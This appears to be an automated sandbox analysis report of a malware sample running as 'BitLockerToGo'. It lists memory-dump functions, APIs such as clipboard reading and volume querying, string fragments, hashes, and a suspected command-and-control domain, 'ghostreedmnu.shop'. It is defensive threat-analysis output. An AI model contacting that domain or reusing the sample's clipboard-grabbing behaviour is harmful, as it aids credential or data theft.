Instruction ID: a19644bb1046cd88f25f410e7f1da3a7648c0b427be0fe6ab5dccff1887c2f1e
Opcode Fuzzy Hash: dff94b72b710ade5368625f02855ea2d4978c95ba2f20df63b28deb4ed786346
Instruction Fuzzy Hash: C14128B0048340EFE3609F19D884B5BBBF4FB86305F50990CF5C997292DB7598458F66

Function 0071F650 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07b1b45f7f633342c08eed07356dbea96673c7b901f1008be6b062d66eda2f79
Instruction ID: 61ee9176d05b9045316d881f2e5efb9ee06fd30a43dc6d1e84e68cc3bf00d2f9
Opcode Fuzzy Hash: 07b1b45f7f633342c08eed07356dbea96673c7b901f1008be6b062d66eda2f79
Instruction Fuzzy Hash: 7721083360C3544FC315AE3C9C902AEB792EBC5324F59863DE9A54B3C2E6759C8193C1

Function 0071ED40 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 315
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 0071ED9C
SysAllocString.OLEAUT32 ref: 0071EE5C
VariantInit.OLEAUT32(00000000), ref: 0071EEE1
SysStringLen.OLEAUT32(?), ref: 0071EF9B

Strings

n]9_, xrefs: 0071EDEE
h=s?, xrefs: 0071EDAE
{9f;, xrefs: 0071EDB6
&QaS, xrefs: 0071EDE6
`a, xrefs: 0071EE06
3e5g, xrefs: 0071EDFE
dElG, xrefs: 0071EDBE

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: String$Alloc$InitVariant
String ID: &QaS$3e5g$`a$dElG$h=s?$n]9_${9f;
API String ID: 3520221836-1152898833
Opcode ID: 4bc623ba95f5847ed7145088456f422f3f73e2b91ec766c1b7366fe196cb9a40
Instruction ID: ca21ffd30d261c9e4899d5491c1ebfb21e6cb1e1d512b01dc9943ae870e6b9f2
Opcode Fuzzy Hash: 4bc623ba95f5847ed7145088456f422f3f73e2b91ec766c1b7366fe196cb9a40
Instruction Fuzzy Hash: E4C15675608340EFD3149F28C894A6BBBE6FFC5751F14892CF4858B2A2D739D882CB52

Function 006ECE80 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 165
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 006ECE91
GetCurrentThreadId.KERNEL32 ref: 006ECEA6
GetCurrentProcessId.KERNEL32 ref: 006ECEAC
ExitProcess.KERNEL32 ref: 006ED080

Strings

98?>, xrefs: 006ED043, 006ED04B
=<#", xrefs: 006ED00E

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID: 98?>$=<#"
API String ID: 1029096631-575674944
Opcode ID: 1991f9f1626b0185fd9257fbb6490f246261c0011b2524b7bd5aba9f40766d2b
Instruction ID: 8888152f3d3896dd19fd3c629d948733261ee705dac85926179ece634a1a7e9d
Opcode Fuzzy Hash: 1991f9f1626b0185fd9257fbb6490f246261c0011b2524b7bd5aba9f40766d2b
Instruction Fuzzy Hash: 4451007040E380ABD311BF69E554A2EFBE6AF56745F188D0CE5C48B352D23AC8158B6B

Function 0071F159 Relevance: 6.0, APIs: 4, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantClear.OLEAUT32(00000008), ref: 0071F166
SysFreeString.OLEAUT32(?), ref: 0071F18A
SysFreeString.OLEAUT32(?), ref: 0071F193
SysFreeString.OLEAUT32(?), ref: 0071F1A7

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: FreeString$ClearVariant
String ID:
API String ID: 3349467263-0
Opcode ID: c04f50d38cbe9f4bf3eb768a5064c8189e004057e362f4e48286b0aa0d0c1a7d
Instruction ID: 00433be74b2e9cfc3d6174e1106ae71fc54c3766bc19f26ff4a1fc413d6f7125
Opcode Fuzzy Hash: c04f50d38cbe9f4bf3eb768a5064c8189e004057e362f4e48286b0aa0d0c1a7d
Instruction Fuzzy Hash: F4F07479504304DFC620ABA0D88891ABBB9FFC9315F148968F989D7321CB39E842CF12

Function 00722CE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00722D33

Strings

B-r, xrefs: 00722D39

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID: B-r
API String ID: 1279760036-310299203
Opcode ID: 63d29d48e039e672914d72a793299b19bba628674cf82ba21ba82cdf7e23622c
Instruction ID: cc1fb9fe21d6689f704dcb109ee2030d28e159cd2adfe61919d156d89e4f6394
Opcode Fuzzy Hash: 63d29d48e039e672914d72a793299b19bba628674cf82ba21ba82cdf7e23622c
Instruction Fuzzy Hash: 6BF0173450D250ABD302EF18E958E1EFBE5EF5A702F44895CE4C597262C339E810CBA6

Function 00724CCE Relevance: 1.6, APIs: 1, Instructions: 71
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 00724D4C

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4b12b0028cdb0c2c4bee2967bd5623506eb72986a704e11907d4ff45afce4d21
Instruction ID: 67e61016051531527186432eae91e61539ce33fd44b4ca79cffe7658350d7970
Opcode Fuzzy Hash: 4b12b0028cdb0c2c4bee2967bd5623506eb72986a704e11907d4ff45afce4d21
Instruction Fuzzy Hash: 1121D3B5A402469FD700CFA9E49076EBBB1BF09306F648418D141F7342C378EA12CFA5

Function 00722D62 Relevance: 1.5, APIs: 1, Instructions: 44
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 00722DE2

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ac5b6264a71e421e0820329da5286a032d216ce609ebddda0d8444026afb285d
Instruction ID: 1c559e5b6747ce1bcbc56f05d840a96dc2ad8b1bdeb8e66d53ed20f8bd8fbc32
Opcode Fuzzy Hash: ac5b6264a71e421e0820329da5286a032d216ce609ebddda0d8444026afb285d
Instruction Fuzzy Hash: B5016935248250EFE311AF18F859D19BBF1EB0AB06F148C68E4C097362C339DC62CB56

Function 0071F2DE Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0071F332

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: cf9dedb87f3b5e78a5dea43c6fa4d806f8d6df3af20d822f1fb4ac62c1b85b38
Instruction ID: 9eec5769da9ef4a29176abf5bddcff1103a126579aa9a351041dd0ffbd30c1e5
Opcode Fuzzy Hash: cf9dedb87f3b5e78a5dea43c6fa4d806f8d6df3af20d822f1fb4ac62c1b85b38
Instruction Fuzzy Hash: 04F046703C9300BAF2B02B10BC0BF063A64AB00F4AF344810B7043C0E2E7FA7004992D

Function 00725D10 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(006F2BE5,00000000,00000001), ref: 00725D3E

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 0071ED1C Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0071ED2E

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: bd2b38af9e3038959dd56e360665fa0d37691f285956360bc78b9bca576dd5ff
Instruction ID: 5782e86eabe9e23782861601581229fbf22dc9827cdb3ef7c449d10ac844141d
Opcode Fuzzy Hash: bd2b38af9e3038959dd56e360665fa0d37691f285956360bc78b9bca576dd5ff
Instruction Fuzzy Hash: 35D048303C4305FAF2360B14ED1BF187624AB42F03F205020F381BC0E18AEA6A229A1E

Non-executed Functions

Function 00708581 Relevance: 24.8, Strings: 19, Instructions: 1017COMMON

Download Yara Rule

Strings

l]j_, xrefs: 007090CA
^], xrefs: 007088A4
8K>M, xrefs: 00708C82
HyK{, xrefs: 00709117
31, xrefs: 00708E6D
&+, xrefs: 00708EF1
eUgW, xrefs: 007090E0
Y], xrefs: 007088AF
4`[b, xrefs: 00709900
sAuC, xrefs: 007090A9
>O, xrefs: 00708899
aQaS, xrefs: 007090D5
{8}, xrefs: 00708C56
ZJ, xrefs: 007088BA
DE, xrefs: 00708A72
4`[b, xrefs: 007092E0
*, xrefs: 00708EFC
/$, xrefs: 00708EE6
\_, xrefs: 00708CB9

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: {8}$&+$*$/$$4`[b$4`[b$8K>M$>O$DE$HyK{$Y]$ZJ$\_$^]$aQaS$eUgW$l]j_$sAuC$31
API String ID: 0-3538536219
Opcode ID: 176c726832b23b4b2894fe85f4ac27f940948ca0e6e4874204902951a9ffc4d6
Instruction ID: e7897f7140026363791f6850a06ce3b1b09a91b0c5364d9fdec8917e0e0568a2
Opcode Fuzzy Hash: 176c726832b23b4b2894fe85f4ac27f940948ca0e6e4874204902951a9ffc4d6
Instruction Fuzzy Hash: BEA23CB410D381CBE330CF25D580B9FBBE1BB85740F648A1CE6D99B291DB789845CB92

Function 006FDACA Relevance: 21.1, Strings: 16, Instructions: 1128COMMON

Download Yara Rule

Strings

,-./, xrefs: 006FE443
tuvw, xrefs: 006FE269
`abc, xrefs: 006FE24B
VVZ`, xrefs: 006FE3AD
wvut, xrefs: 006FE2D7
hijk, xrefs: 006FE237
pqrs, xrefs: 006FE4C5
PQRS, xrefs: 006FE2C3
gfed, xrefs: 006FE2FF
pqrs, xrefs: 006FE273
lmno, xrefs: 006FE22D
xyz{, xrefs: 006FE25F
HIJK, xrefs: 006FE287
lmno, xrefs: 006FE4E3
SRQP, xrefs: 006FE31D
defg, xrefs: 006FE241

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,-./$HIJK$PQRS$SRQP$VVZ`$`abc$defg$gfed$hijk$lmno$lmno$pqrs$pqrs$tuvw$wvut$xyz{
API String ID: 0-4259844150
Opcode ID: 9458003ba76503ae3f653c3bb331dff4476f7068e99b3f8a1c7a6bc8b2128cc7
Instruction ID: 3ac32b6396696b145f4854c19ccf5b509c343e418dbda27ef2e89df48f50fed2
Opcode Fuzzy Hash: 9458003ba76503ae3f653c3bb331dff4476f7068e99b3f8a1c7a6bc8b2128cc7
Instruction Fuzzy Hash: 18A287B0601B449FE760DF25C881BE7BBE2AF45304F14481CE6EA9B2A1DB36B545CF91

Function 00717DE0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 100clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00717DF0
GetWindowLongW.USER32 ref: 00717E15
GetClipboardData.USER32 ref: 00717E25
GlobalLock.KERNEL32 ref: 00717E44
GlobalUnlock.KERNEL32 ref: 00717F2E
CloseClipboard.USER32 ref: 00717F37

Strings

c, xrefs: 00717EA1
], xrefs: 00717EB5

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: ]$c
API String ID: 2832541153-3195450805
Opcode ID: 0daa1a8ff4a14df9507746c8599ea8dc66d98dbfffdcb0d4383d788888ec9d97
Instruction ID: 7ea7f8731b66c95df24666f4a5d338751410916c8cd9096f3b4da03ba96943fb
Opcode Fuzzy Hash: 0daa1a8ff4a14df9507746c8599ea8dc66d98dbfffdcb0d4383d788888ec9d97
Instruction Fuzzy Hash: 3B414F7150C7828EC315AF7C948875FBFE09B96224F044A5DF4E9862D2D238C98AC7A7

Function 00711167 Relevance: 12.9, APIs: 4, Strings: 2, Instructions: 2395COMMON

Download Yara Rule

Strings

DEyv, xrefs: 00713101
CT"P, xrefs: 007129B6

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: CT"P$DEyv
API String ID: 0-2502682913
Opcode ID: f6de0aa91933f1d3d88e267177cfb8066389f378ee73404cd99c99d74ebcc474
Instruction ID: c92d1dafb06b0ff9b2f129bdc5032277ebf85d0256d051d6c9cc7b5b29cc200a
Opcode Fuzzy Hash: f6de0aa91933f1d3d88e267177cfb8066389f378ee73404cd99c99d74ebcc474
Instruction Fuzzy Hash: CAF2AE701047818FD7268F29C490B62FBE1EF16314F18C99DD8DA8B693C73AE956CB61

Function 006F0690 Relevance: 11.8, Strings: 9, Instructions: 532COMMON

Download Yara Rule

Strings

R(, xrefs: 006F0720
AQ, xrefs: 006F0718
A{y, xrefs: 006F0E00
\S, xrefs: 006F0D0C
A{y, xrefs: 006F0C6F, 006F0C88, 006F0C80, 006F0C8C
ghostreedmnu.shop, xrefs: 006F09A3, 006F09B8
$#, xrefs: 006F0A9C
A{y, xrefs: 006F0BF6, 006F0BD3, 006F0D56, 006F0D33, 006F0BDB, 006F0D3B
sq, xrefs: 006F0CCC

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $#$A{y$A{y$A{y$AQ$R($\S$ghostreedmnu.shop$sq
API String ID: 0-424773896
Opcode ID: 8e8f3d121e3aa75bf2e9e7ba1aeadd0b1097989501208fc4708ab91d0278bb7a
Instruction ID: 1b7a4ce7677d1f3c81082fb661e023ec546666679d5ef0fca81d03bf733159d3
Opcode Fuzzy Hash: 8e8f3d121e3aa75bf2e9e7ba1aeadd0b1097989501208fc4708ab91d0278bb7a
Instruction Fuzzy Hash: C81261B4109384EBE3209F14D981B6FBBF6EF86B41F50991CF5C88B252D3789800DB5A

Function 006E1000 Relevance: 10.8, Strings: 8, Instructions: 751COMMON

Download Yara Rule

Strings

0123456789abcdefxp, xrefs: 006E14F7, 006E1588
gfff, xrefs: 006E1EB6
, xrefs: 006E15BE
A, xrefs: 006E1D91
+, xrefs: 006E1DA7
0123456789ABCDEFXP, xrefs: 006E14EE, 006E157C
gfff, xrefs: 006E1E6F
gfff, xrefs: 006E1E04

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: $+$0123456789ABCDEFXP$0123456789abcdefxp$A$gfff$gfff$gfff
API String ID: 0-1336692317
Opcode ID: a3fdf810d8cf5fb901d20f08b0f0572ea6bb75fb2d51c1547048c91a7b42e6d1
Instruction ID: 07ac2acb85de12a2d4fac50b2248f43285f8dd2a7b785486d037ab197e62e317
Opcode Fuzzy Hash: a3fdf810d8cf5fb901d20f08b0f0572ea6bb75fb2d51c1547048c91a7b42e6d1
Instruction Fuzzy Hash: 6342C77160A3C18FD718CE2AC49036EBBE3ABD9314F188A2DE4D58B391D774DD469B42

Function 0070CD08 Relevance: 10.5, Strings: 8, Instructions: 496COMMON

Download Yara Rule

Strings

oB&V, xrefs: 0070D369
72O1, xrefs: 0070D379
Y", , xrefs: 0070D3E3, 0070D3E7
?s27, xrefs: 0070D381
4`[b, xrefs: 0070D270
Y,u[, xrefs: 0070D371
4`[b, xrefs: 0070D300
]ZS/, xrefs: 0070D359

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$72O1$?s27$Y", $Y,u[$]ZS/$oB&V
API String ID: 0-3181983892
Opcode ID: ee22ce57ec4ebcf06862583417c8e18bc3cf056f965cf8b97fc6ab747fcab8e0
Instruction ID: 940e3b31911e4f5815f372464bce5fdaff2febd856a5a97eb5885347b9f16fce
Opcode Fuzzy Hash: ee22ce57ec4ebcf06862583417c8e18bc3cf056f965cf8b97fc6ab747fcab8e0
Instruction Fuzzy Hash: 9CF11671508342CFE710DF68E88072ABBE2BF8A311F588A6CF49597291D739EC45CB56

Function 0070ABF9 Relevance: 10.4, Strings: 8, Instructions: 429COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0070B030
4`[b, xrefs: 0070B170
MNO, xrefs: 0070AF20
w|, xrefs: 0070ACA0
@{, xrefs: 0070ACAB
KJML, xrefs: 0070B134
@[, xrefs: 0070AC95
Rz, xrefs: 0070AC8A

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$@[$@{$KJML$Rz$w|$MNO
API String ID: 0-1623158609
Opcode ID: e51f74a187f0de24f58f69703548538ea268bf23d03bd090da64cb58e2aa5a09
Instruction ID: bc3fe4157451feeb57f5c8d62e231dd63e96921a60335247771dc86ecd1b9dfd
Opcode Fuzzy Hash: e51f74a187f0de24f58f69703548538ea268bf23d03bd090da64cb58e2aa5a09
Instruction Fuzzy Hash: B6E1A5B5508381CBE324DF24D880B6EBBF1FB86305F44891CF6958B2A1E7399944CB96

Function 006EDBF0 Relevance: 10.3, Strings: 8, Instructions: 321COMMON

Download Yara Rule

Strings

1,'&, xrefs: 006EDD74
!4-0, xrefs: 006EDD6C
@A, xrefs: 006EDF96
D, xrefs: 006EDE2F
A87356CF577DB7E665542B118A15FDA8, xrefs: 006EDCAC
Q]T_, xrefs: 006EDF8B
TW, xrefs: 006EDFF7
9(0-, xrefs: 006EDDA3, 006EDDAB

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: !4-0$1,'&$9(0-$@A$A87356CF577DB7E665542B118A15FDA8$D$Q]T_$TW
API String ID: 0-1740552691
Opcode ID: dee1fa5feb881eae234c71569cf824fdc7569ced375766695008950f0f4d275c
